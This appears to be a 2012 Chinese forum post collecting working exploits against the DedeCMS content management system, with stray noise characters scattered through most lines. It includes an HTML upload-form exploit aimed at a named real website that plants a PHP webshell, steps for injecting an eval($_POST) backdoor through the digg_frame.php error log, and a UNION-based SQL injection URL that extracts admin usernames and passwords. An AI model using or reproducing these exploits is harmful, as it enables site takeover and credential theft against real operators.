$ G5 d/ m: i# a2 ~' s
7 H$ A3 d+ U# y0 |& G: i4 ] ^$ D Y6 F. r) N4 f' w
' R% o& E2 z" O, W& H! H
4 l+ I( v- z3 G, t3 K; s
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
9 [/ X/ c2 K* } N, N) h/ E* |<html>% R' l7 C/ I0 s
<head>
% b4 f; g; V( ~1 D3 n0 a$ w% O: }<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
7 H# i4 D* M$ P- {/ A! V</head># U0 g; l! Z& ~" X
<body style="FONT-SIZE: 9pt">
' l9 I7 e' P8 H$ n8 a( s- g* Z4 i---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />7 [' a( G8 w- [8 h F0 J
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>7 k8 `, t; U5 @, d& I+ h; A L
<input type='hidden' name='activepath' value='/data/cache/' />
3 ~1 |( o# C$ u. b0 w" U<input type='hidden' name='cfg_basedir' value='../../' />) A5 K- Y' U' R4 L! T: \3 i
<input type='hidden' name='cfg_imgtype' value='php' />! e6 N9 L& W+ E& M5 |
<input type='hidden' name='cfg_not_allowall' value='txt' />$ K) P# I: T6 N
<input type='hidden' name='cfg_softtype' value='php' />
! _/ Y7 N0 M9 T; N8 H- U Y7 f<input type='hidden' name='cfg_mediatype' value='php' />, X: y( h" `& L( U4 U4 E
<input type='hidden' name='f' value='form1.enclosure' />
4 V" w# ^9 R8 p% q- B2 ]2 P: o<input type='hidden' name='job' value='upload' />+ T$ Y# s$ ]' J! v
<input type='hidden' name='newname' value='fly.php' />
# y+ X6 w6 o# ^Select U Shell <input type='file' name='uploadfile' size='25' />
( a ]) S9 N4 P+ a<input type='submit' name='sb1' value='确定' />4 R. K2 z" w4 ]/ t
</form>
; G6 y% C: B2 H8 i) _" a4 Z, u<br />It's just a exp for the bug of Dedecms V55...<br />
. V }/ s8 ?( }# `- P$ M$ x1 _" c3 }Need register_globals = on...<br /># D2 @! U% O! \! V
Fun the game,get a webshell at /data/cache/fly.php...<br />3 L* I; T) M. `; @. e4 e p9 G
</body>' d: C3 D: E& G
</html>- s, C3 w3 |0 ]1 @' c" V# r" E: p+ v
3 E3 _7 X/ [# V3 R
( L* T) J) z5 j' m* b- {
& z* x5 l5 k8 B S1 L, \- V7 i; J- p. }. i) G% x9 w, o' v2 T
1 E% T3 l6 x1 @3 S& o8 ]% [- ^
% e$ ? l' E% i
! V9 \/ |' L$ C$ G1 d) ?
$ |& V z7 H& |* J- e+ \& q2 I+ O; Q9 [+ m. ^
4 S$ m) {' }0 R$ S L _
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞2 h5 j- @& q1 H
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
" N' T: t7 e, K o, l% @1. 访问网址:8 _; m; u: M4 p, n) q9 e
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>' y' A4 @& | f& Y
可看见错误信息
M# Y5 w9 q5 E0 T
@& t4 ?" U/ D: x2 r8 x2 _4 ]* }* U/ a! n4 A, X
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。$ i! {) U$ `" S4 v- e
int(3) Error: Illegal double '1024e1024' value found during parsing% i ]" @$ v0 D- z7 x) t# d, U
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>4 D/ g+ t, ]( p- A) A' c0 t$ X
8 o+ M, z- ~& m0 C
. n$ s$ r1 q6 s3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
E }% E' E: `& E: f( j* q4 K, B0 z+ b7 B% @: r
' N# s" X$ p6 K( w0 W<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
* p# F% S/ |- f! G
; O- ?/ m2 B* d3 X
3 z6 m: M6 @; O6 c按确定后的看到第2步骤的信息表示文件木马上传成功.
- U3 A) g# e" V; \1 M8 z. X% D4 W4 L9 k. v+ y
" |; e/ O, r) k; H* I# L( G2 o
' [( C' ]1 f3 a4 Z$ }# s/ k4 S
0 `( Y1 R. a0 @. B; X) {9 C. a/ D) @' O3 T- h
% f) z# F! }/ m1 p5 L% ^
8 ?7 h" F+ F! W
7 |, q$ Q8 b/ G4 l- ?8 g% ^& o) a; w6 Q: K7 s. {7 P
# q5 L R& H+ f1 a, k9 P( V6 k
9 u) |9 ~' d% p0 d9 B6 F" O U1 h$ N) Q1 f
织梦(DedeCms)plus/infosearch.php 文件注入漏洞3 d6 I, m* ^0 z4 t
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对